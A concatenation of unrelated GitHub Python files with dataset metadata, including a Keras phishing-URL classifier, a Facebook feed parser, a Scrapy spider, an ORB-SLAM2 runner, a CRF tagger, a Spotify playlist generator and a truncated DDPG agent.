        conv4 = get_conv_layer(emb, kernel_size=5, filters=256)
        # Fully Connected Layers
        merged = concatenate([conv1, conv2, conv3, conv4], axis=1)
        hidden1 = Dense(1024)(merged)
        hidden1 = ELU()(hidden1)
        hidden1 = BatchNormalization(mode=0)(hidden1)
        hidden1 = Dropout(0.5)(hidden1)
        hidden2 = Dense(1024)(hidden1)
        hidden2 = ELU()(hidden2)
        hidden2 = BatchNormalization(mode=0)(hidden2)
        hidden2 = Dropout(0.5)(hidden2)
        # Output layer (last fully connected layer)
        output = Dense(1, activation='sigmoid', name='output')(hidden2)
        # Compile model and define optimizer
        self.model = Model(input=[main_input], output=[output])
        self.adam = Adam(lr=1e-4, beta_1=0.9, beta_2=0.999, epsilon=1e-08, decay=0.0)
        self.model.compile(optimizer=self.adam, loss='binary_crossentropy', metrics=['accuracy'])
    def save_model(self, fileModelJSON, fileWeights):
        """Persist the model using the project's utils.save_model helper."""
        save_model(self.model, fileModelJSON, fileWeights)
    def load_model(self, fileModelJSON, fileWeights):
        """Load a saved model via utils.load_model and recompile it.

        NOTE(review): ``load_model`` here is the helper imported from utils,
        which shadows keras.models.load_model -- confirm that is intended.
        """
        self.model = load_model(fileModelJSON, fileWeights)
        self.model.compile(optimizer=self.adam, loss='binary_crossentropy', metrics=['accuracy'])
    def train_model(self, x_train, target_train, epochs=5, batch_size=32):
        """Fit the network; progress is appended to CNN_log.csv via csv_logger."""
        print("Training CNN model with " + str(epochs) + " epochs and batches of size " + str(batch_size))
        self.model.fit(x_train, target_train, epochs=epochs, batch_size=batch_size, verbose=1, callbacks=[self.csv_logger])
    def test_model(self, x_test, target_test):
        """Evaluate on the test split; returns keras metrics (loss + accuracy)."""
        print("testing CNN model")
        return self.model.evaluate(x_test, target_test, verbose=1)
    def predict(self, x_input):
        """Classify a single URL string; returns 'benign' or 'malicious'."""
        # Map each printable character to its 1-based index; other chars dropped.
        url_int_tokens = [[printable.index(x) + 1 for x in x_input if x in printable]]
        X = sequence.pad_sequences(url_int_tokens, maxlen=self.max_len)
        p = self.model.predict(X, batch_size=1)
        # Sigmoid output: below 0.5 is the benign class.
        return "benign" if p < 0.5 else "malicious"
def export_plot(self):
plot_model(self.model, to_file='CNN.png') | larranaga/phishing-url-detection | CNNC.py | CNNC.py | py | 3,833 | python | en | code | 5 | github-code | 36 | [
{
"api_name": "keras.regularizers.l2",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "keras.regularizers",
"line_number": 17,
"usage_type": "name"
},
{
"api_name": "keras.callbacks.CSVLogger",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "ke... |
11316424779 | import json
import re
from pprint import pprint  # NOTE(review): imported but never used here

# Scan a saved Facebook group feed dump for messages mentioning "hackathon"
# and print a running count together with each match's updated_time.
with open('yc_feed.json') as data_file:
    data = json.load(data_file)

i = 0  # page index (presumably incremented per outer iteration below -- verify)
c = 0  # number of matching messages printed so far
for hundredmessages in data:
    # Cheap pre-filter: serialise the whole page and search it before
    # inspecting individual messages.
    hm_plain_text = json.dumps(hundredmessages)
    match = re.search(r'hackathon', hm_plain_text)
    if match:
        for msg in hundredmessages['data']:
            msg_plain_text = json.dumps(msg)
            match = re.search(r'hackathon', msg_plain_text)
            if match:
                c = c + 1
                print('---')
                print(c)
                print(i)
                print(msg['updated_time'])
                print('###')
i = i + 1 | adamhipster/hackathon_website | python_fb_group_crawls/parse_fb_feed_data.py | parse_fb_feed_data.py | py | 530 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "json.load",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 11,
"usage_type": "call"
},
{
"api_name": "re.search",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "json.dumps",
"line_number": 15,
... |
43540671742 | """
"""
import numpy as np
from scipy.signal import find_peaks_cwt
from scipy.ndimage import gaussian_filter1d
def peak_finder(
    curve: np.ndarray,
    smoothing_factor: float = 21.0,
) -> np.ndarray:
    """Locate peak indices in a 1-D curve.

    The curve is Gaussian-smoothed, then scanned with a continuous wavelet
    transform over a range of candidate peak widths proportional to the
    curve length.

    Args:
        curve: 1-D signal to analyse.
        smoothing_factor: sigma of the Gaussian pre-smoothing.

    Returns:
        Array of indices of detected peaks.
    """
    # BUG FIX: clamp the width bounds and step to >= 1; for short curves the
    # original produced a zero step (np.arange raises ValueError) or an
    # empty width range.
    min_width = max(1, int(curve.size / 20))
    max_width = max(min_width + 1, int(curve.size / 5))
    resolution = max(1, int((max_width - min_width) / 19))
    peak_width = np.arange(min_width, max_width, resolution)
    new_curve = gaussian_filter1d(curve, sigma=smoothing_factor)
    indx = find_peaks_cwt(new_curve, peak_width)
    return indx
| chriswilly/design_patterns | data_science/misc.py | misc.py | py | 528 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "numpy.ndarray",
"line_number": 9,
"usage_type": "attribute"
},
{
"api_name": "numpy.arange",
"line_number": 17,
"usage_type": "call"
},
{
"api_name": "scipy.ndimage.gaussian_filter1d",
"line_number": 19,
"usage_type": "call"
},
{
"api_name": "scipy.... |
27769169402 | import scrapy
from scrapy.linkextractors import LinkExtractor
from scrapy.spiders import CrawlSpider, Rule
class XyjjSpider(CrawlSpider):
    """Crawl spider for article listings on www.xyshjj.cn."""

    name = 'xyjj'
    # allowed_domains = ['www.ccc.com']
    start_urls = ['https://www.xyshjj.cn/list-1487-1489-0.html']
    # (translated) Pagination links are too similar to the other links, so the
    # rules below do not work as intended -- abandoned.
    # NOTE(review): the `allow` pattern looks like HTML markup, but
    # LinkExtractor applies it to URLs, so this rule likely matches nothing.
    rules = (
        Rule(LinkExtractor(allow=r'">\d+</a>'), callback='parse_item', follow=True),
    )

    def parse_item(self, response):
        """Print (url, title) pairs from one listing page; returns an empty item."""
        item = {}
        #item['domain_id'] = response.xpath('//input[@id="sid"]/@value').get()
        #item['name'] = response.xpath('//div[@id="name"]').get()
        #item['description'] = response.xpath('//div[@id="description"]').get()
        ls = response.xpath('.//div[@class="article-list"]/div')
        print('---------')
        for i in ls:
            url = i.xpath('./div/a/@href').get()
            num = i.xpath('./div/a/text()').get()
            print(url, ' - ', num)
        return item
| kshsky/PycharmProjects | dataFile/scrapy/ace/xxjjCrawl/xxjjCrawl/spiders/xyjj.py | xyjj.py | py | 992 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "scrapy.spiders.CrawlSpider",
"line_number": 6,
"usage_type": "name"
},
{
"api_name": "scrapy.spiders.Rule",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "scrapy.linkextractors.LinkExtractor",
"line_number": 12,
"usage_type": "call"
}
] |
28068050082 | # 보물섬
# https://www.acmicpc.net/problem/2589
from collections import deque
import copy
def bfs(treasure_map, x, y, n, m):
    """Breadth-first search over land cells ('L') starting at (x, y).

    Returns the number of moves needed to reach the land cell farthest (in
    shortest-path distance) from the start. Water cells ('W') block movement;
    visits are marked on a private deep copy so the caller's map is untouched.
    """
    visited = copy.deepcopy(treasure_map)
    visited[x][y] = 'W'  # mark the start cell as seen
    queue = deque([[x, y, 0]])
    farthest = 0
    while queue:
        row, col, dist = queue.popleft()
        # BFS pops cells in non-decreasing distance order, so the distance of
        # the last cell popped is the maximum.
        farthest = dist
        for drow, dcol in ((-1, 0), (1, 0), (0, -1), (0, 1)):
            nrow, ncol = row + drow, col + dcol
            if not (0 <= nrow < n and 0 <= ncol < m):
                continue
            if visited[nrow][ncol] == 'L':
                visited[nrow][ncol] = 'W'
                queue.append([nrow, ncol, dist + 1])
    return farthest
def solution():
    """Read the board from stdin and print the longest shortest path on land.

    BOJ 2589 ("Treasure Island"): runs a BFS from every land cell ('L') and
    prints the maximum shortest-path distance found.
    """
    n, m = map(int, input().split())
    treasure_map = []
    count_list = []
    for _ in range(n):
        temp = list(input())
        treasure_map.append(temp)
    # Exhaustive search: BFS from every land cell.
    for i in range(n):
        for j in range(m):
            if treasure_map[i][j] == 'L':
                count_list.append(bfs(treasure_map, i, j, n, m))
    print(max(count_list))
solution()
| hwanginbeom/algorithm_study | 1.algorithm_question/6.BFS/131.BFS_wooseok.py | 131.BFS_wooseok.py | py | 1,279 | python | ko | code | 3 | github-code | 36 | [
{
"api_name": "copy.deepcopy",
"line_number": 8,
"usage_type": "call"
},
{
"api_name": "collections.deque",
"line_number": 15,
"usage_type": "call"
}
] |
28801077672 | # -*- coding: utf-8 -*-
"""
Created on Thu Feb 1 09:03:59 2018
@author: a001985
"""
import logging
import pathlib
#==========================================================================
def add_log(log_id=None, log_directory=None, log_level='DEBUG', on_screen=True, prefix='log_ekostat'):
"""
log_id: Id of the logger. Typically a UUID
log_directory: Directory to put the log files in. If not given no files are created.
log_level: Specify the log level.
on_screen: Set to True if you want to print to screen as well. Default is True.
prefix: Prefix to be added to the files.
--------------------------------------------------------------
Usage:
self._logger = logging.getLogger('......')
self._logger.debug('Debug message.')
self._logger.info('Info message.')
self._logger.warning('Warning message.')
self._logger.error('Error message.')
try: ...
except Exception as e:
self._logger.error('Exception: ' + str(e))
"""
# logging_format = '%(asctime)s\t%(filename)s\t%(funcName)s\t%(levelname)-10s : %(message)s'
logging_format = '%(asctime)s\t%(filename)s\t%(lineno)d\t%(funcName)s\t%(levelname)s\t%(message)s'
log_id_ext = '{}_{}'.format(prefix, log_id)
log = logging.getLogger(log_id_ext)
# Dont add an excisting logger
if len(log.handlers):
return False
print('='*100)
print(log_id)
print(log_directory)
print(prefix)
print('-'*100)
# Set debug log_level
level_mapping = {'DEBUG': logging.DEBUG,
'INFO': logging.INFO,
'WARNING': logging.WARNING,
'ERROR': logging.ERROR}
log_level = level_mapping.get(log_level.upper(), 'ERROR')
log.setLevel(log_level)
if log_directory:
dir_path = pathlib.Path(log_directory)
log_path = pathlib.Path(dir_path, '{}_{}.log'.format(prefix, log_id))
# Log directories.
if not dir_path.exists():
dir_path.mkdir(parents=True)
# Define rotation log files for internal log files.
try:
log_handler = logging.handlers.RotatingFileHandler(str(log_path),
maxBytes = 128*1024,
backupCount = 10)
log_handler.setFormatter(logging.Formatter(logging_format))
log_handler.setLevel(log_level)
log.addHandler(log_handler)
except Exception as e:
print('EKOSTAT logging: Failed to set up file logging: ' + str(e))
if on_screen:
try:
log_handler_screen = logging.StreamHandler()
log_handler_screen.setFormatter(logging.Formatter(logging_format))
log_handler_screen.setLevel(log_level)
log.addHandler(log_handler_screen)
except Exception as e:
print('EKOSTAT logging: Failed to set up screen logging: ' + str(e))
log.debug('')
log.debug('='*120)
log.debug('### Log added for log_id "{}" at locaton: {}'.format(log_id, str(log_path)))
log.debug('-'*120)
return True
#==========================================================================
def get_log(log_id):
    """Return the logger whose registered name contains *log_id*.

    Falls back to logging.getLogger(log_id) when no registered logger name
    matches, which creates/returns a logger with that exact name.
    """
    full_name = next(
        (name for name in logging.Logger.manager.loggerDict if log_id in name),
        log_id,
    )
    return logging.getLogger(full_name)
| ekostat/ekostat_calculator | core/logger.py | logger.py | py | 3,803 | python | en | code | 1 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 39,
"usage_type": "call"
},
{
"api_name": "logging.DEBUG",
"line_number": 50,
"usage_type": "attribute"
},
{
"api_name": "logging.INFO",
"line_number": 51,
"usage_type": "attribute"
},
{
"api_name": "logging.WARNIN... |
34848625388 | from __future__ import absolute_import
from __future__ import unicode_literals
__version__ = '0.5.0'
from markdown import Extension
from markdown.treeprocessors import Treeprocessor
class MDXReplaceImageSrcTreeprocessor(Treeprocessor):
    """Tree processor that rewrites the src attribute of every <img> element."""

    def __init__(self, md, config):
        super(MDXReplaceImageSrcTreeprocessor, self).__init__(md)
        self.config = config  # expects 'find' and 'replace' string entries

    def run(self, root):
        # Walk the whole element tree and rewrite each image source in place.
        imgs = root.iter("img")
        for image in imgs:
            image.set("src", self.find_replace(image.attrib["src"]))

    def find_replace(self, path):
        """Return *path* with config['find'] substituted by config['replace']."""
        return path.replace(self.config["find"], self.config["replace"])
class MDXReplaceImageSrcExtension(Extension):
    """Markdown extension wiring up the img-src find/replace tree processor."""

    def __init__(self, *args, **kwargs):
        # Config schema: [default value, description] per python-markdown convention.
        self.config = {
            'find' : ["", "the string to find"],
            'replace': ["", "the string to replace"],
        }
        super(MDXReplaceImageSrcExtension, self).__init__(*args, **kwargs)

    def extendMarkdown(self, md, md_globals):
        """Hook called by markdown: attach the processor at the end of the chain."""
        ReplaceImageSrc = MDXReplaceImageSrcTreeprocessor(md, self.getConfigs())
        md.treeprocessors.add(
            "ReplaceImageSrc",
            ReplaceImageSrc,
            "_end"
        )
        md.registerExtension(self)
def makeExtension(*args, **kwargs):
    """Entry point used by python-markdown to instantiate the extension."""
    return MDXReplaceImageSrcExtension(*args, **kwargs)
| twardoch/markdown-steroids | mdx_steroids/replimgsrc.py | replimgsrc.py | py | 1,313 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "markdown.treeprocessors.Treeprocessor",
"line_number": 10,
"usage_type": "name"
},
{
"api_name": "markdown.Extension",
"line_number": 23,
"usage_type": "name"
}
] |
7045186193 | #!/usr/bin/python3
import argparse
import orbslam2
import os
import cv2
from time import sleep
def build_parser():
    """Create the CLI parser: --vocab, --config and --seq are all required strings."""
    parser = argparse.ArgumentParser()
    for flag in ('--vocab', '--config', '--seq'):
        parser.add_argument(flag, type=str, required=True)
    return parser
def main(args):
    """Run stereo ORB-SLAM2 over a sequence directory and dump the trajectory.

    Expects args.seq to contain rgb_left.txt / rgb_right.txt whose non-comment
    lines are '<timestamp> <relative image path>'; left and right files are
    read in lockstep.
    """
    sequence = []
    with open(os.path.join(args.seq, 'rgb_left.txt'), 'r') as f_left, open(os.path.join(args.seq, 'rgb_right.txt'), 'r') as f_right:
        for line_left, line_right in zip(f_left, f_right):
            line_left, line_right = line_left.strip(), line_right.strip()
            # '#' lines are headers/comments; only the left file is checked.
            if line_left.startswith('#'):
                continue
            ts, img_left_path = line_left.split()
            _, img_right_path = line_right.split()
            sequence.append((float(ts), os.path.join(args.seq, img_left_path), os.path.join(args.seq, img_right_path)))

    slam = orbslam2.System(args.vocab, args.config, orbslam2.Sensor.STEREO)
    slam.set_use_viewer(True)
    slam.initialize()
    for ts, path_left, path_right in sequence:
        img_left = cv2.imread(path_left)
        img_right = cv2.imread(path_right)
        slam.process_image_stereo(img_left, img_right, ts)
        # Fixed 0.1 s pacing between frames -- presumably so the viewer can
        # keep up; confirm before removing.
        sleep(0.1)
    save_trajectory(slam.get_trajectory_points(), 'trajectory.txt')
    slam.shutdown()
def save_trajectory(trajectory, filename):
    """Write trajectory rows as 'time r00 r01 r02 t0 r10 r11 r12 t1 r20 r21 r22 t2'.

    One line per pose, values rendered with repr() so full float precision
    is preserved.
    """
    with open(filename, 'w') as traj_file:
        for row in trajectory:
            # Row order already matches the output order: timestamp followed
            # by the 3x4 [R|t] matrix in row-major order.
            traj_file.write(' '.join(repr(value) for value in row) + '\n')
if __name__ == '__main__':
parser = build_parser()
args = parser.parse_args()
main(args)
| cds-mipt/iprofihack | baselines/orbslam2/scripts/run_orbslam2_stereo.py | run_orbslam2_stereo.py | py | 2,114 | python | en | code | 3 | github-code | 36 | [
{
"api_name": "argparse.ArgumentParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.join",
"line_number": 21,
"usage_type": "call"
},
{
"api_name": "os.path",
"line_number": 21,
"usage_type": "attribute"
},
{
"api_name": "os.path.join",
... |
33675586325 | #!/usr/bin/env python
# coding: utf-8
# In[44]:
import re
import pickle
from sklearn_crfsuite import CRF
from sklearn_crfsuite import metrics
from sklearn_crfsuite import scorers
# In[45]:
def parse(input_):
    """Split a CoNLL-style dump into parallel token streams.

    Sentences are blank-line separated; each contributes one '</s>' marker to
    every stream. The trailing marker is removed from the lexicon stream only
    (matching the original behaviour relied on downstream).

    Returns:
        (lexicons, tags, pos, lemma) lists.
    """
    lexicons, tags, pos, lemma = [], [], [], []
    for sentence in input_.split("\n\n"):
        for word in sentence.split("\n"):
            tokens = word.split("\t")
            # Column layout: 1=surface form, 2=lemma, 4=POS, 7=tag.
            lexicons.append(tokens[1])
            lemma.append(tokens[2])
            pos.append(tokens[4])
            tags.append(tokens[7])
        for stream in (lexicons, tags, lemma, pos):
            stream.append("</s>")
    lexicons.pop()
    return lexicons, tags, pos, lemma
# In[46]:
def features(sentence, index, pos_sentence):
    """Build the CRF feature dict for the word at *index*.

    sentence is a list of word strings; pos_sentence is the parallel POS list.
    """
    word = sentence[index]
    last = len(sentence) - 1
    return {
        'word': word,
        'is_first_word': int(index == 0),
        'is_last_word': int(index == last),
        'prev_word': sentence[index - 1] if index > 0 else '',
        'next_word': sentence[index + 1] if index < last else '',
        'prev_pre_word': sentence[index - 2] if index > 1 else '',
        'next_next_word': sentence[index + 2] if index < last - 1 else '',
        'is_numeric': int(word.isdigit()),
        # matches strings that end in a digit and contain at least one letter
        'is_alphanumeric': int(bool(re.match('^(?=.*[0-9]$)(?=.*[a-zA-Z])', word))),
        'pos': pos_sentence[index],
    }
# In[47]:
def prepareData(input):
    """Convert a CoNLL-style dump into CRF training data.

    Returns:
        (X, y): X is a list of per-sentence feature-dict lists, y the
        parallel list of per-sentence tag lists.
    """
    lexicons, tags, pos, lemma = parse(input)
    # parse() joins streams with '</s>' sentence markers; split them back out.
    sentences = ' '.join(lexicons).split(' </s> ')
    sentences_pos = ' '.join(pos).split(' </s> ')
    sentences_tags = ' '.join(tags).split(' </s> ')
    X = []
    y = []
    for sentenceid, sentence in enumerate(sentences):
        words = sentence.split(' ')
        # Renamed from `pos` to avoid shadowing the stream list above.
        sent_pos = sentences_pos[sentenceid].split(' ')
        X.append([features(words, index, sent_pos) for index in range(len(words))])
    for sentence_tag in sentences_tags:
        # BUG FIX: the original split the loop-external variable `sentence`
        # (the last lexical sentence) instead of `sentence_tag`, so y held
        # words -- not tags -- and every row was identical.
        # NOTE(review): the last element still carries a trailing '</s>'
        # token (parse() only pops it from the lexicon stream) -- confirm
        # whether that is intended before changing parse().
        y.append(sentence_tag.split(' '))
    return X, y
# POS, Chunck, Lemma, Case Marking
# In[48]:
def train_CRF(X_train, y_train):
    """Fit an L-BFGS CRF (c1=0.01, c2=0.1, 100 iterations) and pickle it to disk."""
    crf = CRF(
        algorithm='lbfgs',
        c1=0.01,
        c2=0.1,
        max_iterations=100,
        all_possible_transitions=True
    )
    crf.fit(X_train, y_train)
    # NOTE(review): the file handle passed to pickle.dump is never closed --
    # consider a with-block.
    pickle.dump(crf, open("./annCorra_crf_pos_model", 'wb'))
# In[49]:
# print(X_train[0])
# print(y_train)
# In[50]:
def test_dev_data(X_test, y_test):
    """Print weighted F1 on the dev/test split plus a per-class report.

    NOTE(review): relies on module-level globals `crf`, `X_train` and
    `y_train` existing before the call -- confirm intended usage. The
    training-set F1 is computed but its value is discarded (not printed).
    """
    y_pred = crf.predict(X_test)
    print("F1 score on Test Data ")
    print(metrics.flat_f1_score(y_test, y_pred, average='weighted', labels=crf.classes_))
    print("F score on Training Data ")
    y_pred_train = crf.predict(X_train)
    metrics.flat_f1_score(y_train, y_pred_train, average='weighted', labels=crf.classes_)
    ### Look at class wise score
    print(metrics.flat_classification_report(
        y_test, y_pred, labels=crf.classes_, digits=3
    ))
# In[51]:
train_file = open('./final_train.txt', 'r', encoding="utf-8")
traininput = train_file.read()
# dev_file = open('./final_dev.txt', 'r', encoding="utf-8")
# devinput = dev_file.read()
# In[52]:
X_train,y_train = prepareData(traininput)
# In[53]:
train_CRF(X_train, y_train)
# In[54]:
# X_test,y_test = prepareData(devinput)
# In[32]:
# test_dev_data(X_test, y_test)
# In[ ]:
# In[ ]:
| hellomasaya/linguistics-data | assgn4/annCorraCRFModel.py | annCorraCRFModel.py | py | 3,577 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "re.match",
"line_number": 55,
"usage_type": "call"
},
{
"api_name": "sklearn_crfsuite.CRF",
"line_number": 88,
"usage_type": "call"
},
{
"api_name": "pickle.dump",
"line_number": 96,
"usage_type": "call"
},
{
"api_name": "sklearn_crfsuite.metrics.fl... |
72582014823 | import spotipy
import openai
import json
import argparse
import datetime
from dotenv import load_dotenv
import os
load_dotenv()
openai.api_key = os.environ.get("OPENAI_API_KEY")
parser = argparse.ArgumentParser(description="Enkelt commandline verktøy")
parser.add_argument("-p", type=str, default="AI genert liste",help="Prompten som beskriver playlisten")
parser.add_argument("-n", type=int, default=10 ,help="Hvor mange sanger ønsker du i playlisten")
args = parser.parse_args()
def get_playlist(prompt, count=10):
    """Ask the OpenAI chat API for *count* songs matching *prompt*.

    A few-shot conversation (system instruction plus one worked example)
    steers the model to reply with a bare JSON array of
    {"song": ..., "artist": ...} objects, which is parsed and returned.

    NOTE(review): json.loads raises if the model's reply is not valid JSON --
    there is no error handling here. The typos in the prompt strings below
    ("helpfull", "retur", ">song_title>") are part of the runtime payload and
    are deliberately left untouched.
    """
    example_json = """
    [
        {"song": "Someone Like You", "artist": "Adele"},
        {"song": "Hurt", "artist": "Johnny Cash"},
        {"song": "Fix You", "artist": "Coldplay"},
        {"song": "Nothing Compares 2 U", "artist": "Sinead O'Connor"},
        {"song": "All By Myself", "artist": "Celine Dion"},
        {"song": "Tears in Heaven", "artist": "Eric Clapton"},
        {"song": "My Immortal", "artist": "Evanescence"},
        {"song": "I Can't Make You Love Me", "artist": "Bonnie Raitt"},
        {"song": "Everybody Hurts", "artist": "R.E.M."},
        {"song": "Mad World", "artist": "Gary Jules"}
    ]
    """
    messages = [
        {"role": "system", "content": """You are a helpfull playlist generating assistant.
        You should generate a list of songs and their artists accordning to a text prompt.
        You should retur it as a json array, where each element follows this format: {"song": >song_title>, "artist": <artist_name>}
        """
         },
        {"role": "user", "content": """Generate a playlist of 10 songs based on this prompt: super super sad songs
        """
         },
        {"role": "assistant", "content": example_json
         },
        {"role": "user", "content": f"Generate a playlist of {count} songs based on this prompt: {prompt}"
         },
    ]
    response = openai.ChatCompletion.create(
        messages=messages,
        model="gpt-3.5-turbo",
        max_tokens=400,
    )
    # The assistant reply is expected to be a bare JSON array.
    playlist = json.loads(response["choices"][0]["message"]["content"])
    return (playlist)
playlist = get_playlist(args.p, args.n)
## JSON format for artists and songs
print(playlist)
sp = spotipy.Spotify(
auth_manager=spotipy.SpotifyOAuth(
client_id=os.environ.get("SPOTIFY_CLIENT_ID"),
client_secret=os.environ.get("SPOTIFY_CLIENT_SECRET"),
redirect_uri="http://localhost:8888/",
scope="playlist-modify-private"
)
)
current_user = sp.current_user()
track_ids = []
assert current_user is not None
for item in playlist:
artist, song = item["artist"], item["song"]
query = f"{song} {artist}"
search_results = sp.search(q=query, type="track", limit=10)
track_ids.append(search_results["tracks"]["items"][0]["id"])
playlist_prompt = args.p
created_playlist = sp.user_playlist_create(
current_user["id"],
public=False,
name=f"{'AI - '} {playlist_prompt} {datetime.datetime.now().strftime('%c')}"
)
sp.user_playlist_add_tracks(
current_user["id"],
created_playlist["id"],
track_ids
) | donadelicc/MySpotify | utils/local_app.py | local_app.py | py | 3,072 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "dotenv.load_dotenv",
"line_number": 9,
"usage_type": "call"
},
{
"api_name": "openai.api_key",
"line_number": 10,
"usage_type": "attribute"
},
{
"api_name": "os.environ.get",
"line_number": 10,
"usage_type": "call"
},
{
"api_name": "os.environ",
... |
30910231452 | import sys
from PyQt5 import uic
from PyQt5.QtGui import QPainter, QColor
from PyQt5.QtWidgets import QWidget, QApplication, QPushButton, QMainWindow
from random import randint
class MyWidget(QMainWindow):
def __init__(self):
super().__init__()
uic.loadUi('Ui.ui', self)
self.do_paint = False
self.pushButton.clicked.connect(self.run)
def paintEvent(self, event):
if self.do_paint is True:
qp = QPainter()
qp.begin(self)
self.draw(qp)
qp.end()
def run(self):
self.do_paint = True
self.repaint()
def draw(self, qp):
qp.setBrush(QColor(237, 255, 33))
r = randint(1, 299)
qp.drawEllipse(30, 120, r, r)
if __name__ == '__main__':
app = QApplication(sys.argv)
ex = MyWidget()
ex.show()
sys.exit(app.exec_()) | Dathator/Git- | main.py | main.py | py | 870 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "PyQt5.QtWidgets.QMainWindow",
"line_number": 9,
"usage_type": "name"
},
{
"api_name": "PyQt5.uic.loadUi",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "PyQt5.uic",
"line_number": 12,
"usage_type": "name"
},
{
"api_name": "PyQt5.QtGui.QPa... |
74469828583 | #! /usr/bin/env python3
import logging
import os
import tempfile
log = logging.getLogger(__name__)
def download_to_disk(config, object_ref):
log.debug('Moving file from {} to temporary file'.format(object_ref))
fd, path = tempfile.mkstemp(os.path.splitext(object_ref)[-1])
os.write(fd, open(object_ref, 'rb').read())
os.close(fd)
return path
| mabruras/sqapi | src/sqapi/query/content/disk.py | disk.py | py | 367 | python | en | code | 2 | github-code | 36 | [
{
"api_name": "logging.getLogger",
"line_number": 6,
"usage_type": "call"
},
{
"api_name": "tempfile.mkstemp",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path.splitext",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "os.path",
"lin... |
21821135553 | # F*ck implementation problems
# Ab to kaam hoja bsdk
# Adding comments so it might be helpful to someone
## Moral: Don't watch IPL during contest
from collections import Counter
for _ in range(int(input())):
n = int(input())
lis = list(map(int, input().split()))
## Check for NO condition
counter = Counter(lis)
if len(counter) <= 1:
print("NO")
continue
print("YES")
oneWala = [1] # Every index a[0]!=a[idx]
othersWala = [] # if equals then it cannot be in oneWala
for i in range(1, n):
if lis[i] != lis[0]:
oneWala.append(i + 1)
else:
othersWala.append(i + 1)
## We need to have atleast one edge from oneWala to othersWala
## So check diff element in oneWala to connect to othersWala element
flag = 0
idx = -1
for i in oneWala:
for j in othersWala:
if lis[i - 1] != lis[j - 1]:
idx = i-1
flag = 1
break
if flag:
break
## Now connect everything in oneWala to 1
for i in oneWala:
if i != 1:
print(1, i)
if len(othersWala) == 0:
continue
## Now connect everything in othersWala to othersWala[0]
for i in othersWala:
print(idx + 1, i)
| sainad2222/my_cp_codes | codeforces/1433/D.py | D.py | py | 1,155 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "collections.Counter",
"line_number": 10,
"usage_type": "call"
}
] |
70123922664 | #! /usr/bin/env python
from sortrobot.mech import Robot
from sortrobot.webcam import Camera
from sortrobot.neural import Classifier, OrientationClassifier
from sortrobot.utils import random_filename
import numpy as np
from PIL import Image
import sys, random, os
from optparse import OptionParser
parser = OptionParser()
parser.add_option("-o", "--outdir", dest="outdir", default='/home/pi/scans',
help="Directory to write sorted scans.")
parser.add_option("-c", "--classifier", dest="classifier", default='orient',
help="Classifier from sortrobot.neural to use.")
opts, args = parser.parse_args(sys.argv[1:])
directory = opts.outdir
assert os.path.exists(directory)
classifier = {
'orient': OrientationClassifier,
'color': Classifier,
}[opts.classifier]()
#DEFAULT_ORDER = 'black,blue,green mana back red,white,other'
DEFAULT_ORDER = 'top_front top_back bot_back bot_front'
order = ' '.join(args)
sr = Robot()
cam = Camera()
MAXITER = 500
while True:
if len(order.split()) != 4:
order = input('Enter a valid order [DEFAULT %s]: ' % DEFAULT_ORDER)
order = order.strip()
if len(order) == 0:
order = DEFAULT_ORDER
if input('Confirm order "%s" [Y/n]? ' % order).strip().lower() == 'n':
order = ''
continue
print('Using order:', order)
DEFAULT_ORDER = order # save for next time
POSITIONS = {}
for pos,arg in enumerate(order.split()):
for label in arg.split(','):
POSITIONS[label] = pos
def go(pos):
if type(pos) is str:
try:
pos = POSITIONS[label]
except(KeyError):
print(' label %s has no position! Choosing 0.' % label)
pos = 0
sr.go(pos)
for i in range(MAXITER):
filebase = random_filename()
filename = os.path.join(directory, filebase)
print('%d scanning -> %s' % (i, filename))
cam.rgb_to_file(filename)
im = Image.open(filename)
label = classifier.classify(im)
print(' classfied as %s' % (label))
new_directory = os.path.join(directory, label)
if not os.path.exists(new_directory):
os.mkdir(new_directory)
print(' moving to %s' % (new_directory))
os.rename(filename, os.path.join(new_directory, filebase))
if label == 'empty':
break
go(label)
sr.feed_card()
order = '' # triggers prompt for input at top of loop
| AaronParsons/sortrobot | scripts/sr_neural_sort.py | sr_neural_sort.py | py | 2,532 | python | en | code | 0 | github-code | 36 | [
{
"api_name": "optparse.OptionParser",
"line_number": 12,
"usage_type": "call"
},
{
"api_name": "sys.argv",
"line_number": 17,
"usage_type": "attribute"
},
{
"api_name": "os.path.exists",
"line_number": 20,
"usage_type": "call"
},
{
"api_name": "os.path",
"lin... |
471364125 | # Adapted from https://github.com/mimoralea/gdrl
from helpers.utils.action_selection import GreedyStrategy, NormalNoiseStrategy
from helpers.utils.priority_replay import Memory
from helpers.nn.network import FCQV, FCDP
from itertools import count
import torch.optim as optim
import numpy as np
import torch
import time
import glob
import os
import gc
LEAVE_PRINT_EVERY_N_SECS = 300
RESULTS_DIR = os.path.join('..', 'results')
ERASE_LINE = '\x1b[2K'
class DDPG_agent:
def __init__(self, policy_info={}, value_info={}, env_info={}, training_info={}, buffer_info={}):
# set device target
self.device = torch.device("cuda:0" if torch.cuda.is_available() else "cpu")
### POLICY NETWORK PARAMETERS
self.online_policy_model = FCDP(env_info["state_size"], env_info["bounds"],
policy_info["hidden_dims"], device=self.device)
self.target_policy_model = FCDP(env_info["state_size"], env_info["bounds"],
policy_info["hidden_dims"], device=self.device)
self.policy_optimizer = optim.Adam(self.online_policy_model.parameters(), lr=policy_info["learning_rate"])
self.policy_max_grad_norm = policy_info["max_grad_norm"]
### VALUE NETWORK PARAMETERS
self.online_value_model = FCQV(env_info["state_size"], env_info["action"],
value_info["hidden_dims"], device=self.device)
self.target_value_model = FCQV(env_info["state_size"], env_info["action"],
value_info["hidden_dims"], device=self.device)
